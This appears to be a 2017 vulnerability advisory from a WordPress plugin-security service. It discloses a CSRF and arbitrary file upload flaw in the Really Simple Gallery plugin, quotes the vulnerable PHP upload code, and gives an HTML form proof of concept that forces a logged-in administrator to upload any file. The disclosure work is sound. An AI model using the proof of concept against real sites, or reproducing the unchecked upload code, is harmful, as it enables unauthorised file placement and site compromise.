13 Mar

Cross-Site Request Forgery (CSRF)/Arbitrary File Upload Vulnerability in Really Simple Gallery

While looking in to a report of a reflected cross-site scripting vulnerability in the plugin Really Simple Gallery we noticed that there is also cross-site request forgery (CSRF)/arbitrary file upload vulnerability in it.

When uploading a file through the plugin’s settings page there is no check for a valid nonce to protect against CSRF, as seen in the file /reallysimplegallery.php starting on line 90:

 if(isset($_POST["addImage"])){
 $target_path = get_option("simple_gallery_uploads");
 $target_path = $target_path . basename( $_FILES['uploadedfile']['name']); 
 
 echo '<div id="setting-error-settings_updated" class="updated settings-error"><p><strong>';

 if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path)) {

While the file being uploaded is supposed to be an image, there is no restriction on what type of file can be uploaded.

We couldn’t find a contact for the developer, so we are notifying the WordPress.org Plugin Directory of the issue.

Proof of Concept

The following proof of concept will cause the chosen file to be uploaded to the directory /wp-content/plugins/really-simple-gallery/uploads/ on the website, when logged in as an Administrator.

Make sure to replace “[path to WordPress]” with the location of WordPress.

<html>
<body>
<form action="http://[path to WordPress]/wp-admin/options-general.php?page=my-unique-identifier" method="POST" enctype="multipart/form-data">
<input type="file" name="uploadedfile" />
<input type="submit" name="addImage" value="Submit" />
</form>
</body>
</html>

Timeline

  • 3/13/2017 – WordPress.org Plugin Directory notified.
  • 3/13/2017 – Removed from WordPress.org Plugin Directory.

Concerned About The Security of the Plugins You Use?

When you order a plugin security review from us we review the plugin for issues that hackers would exploit if the knew about them as well as making sure that that needed security checks have been implemented in the plugin. If you order two reviews you will receive free lifetime subscription to our service.

Leave a Reply

Your email address will not be published. Required fields are marked *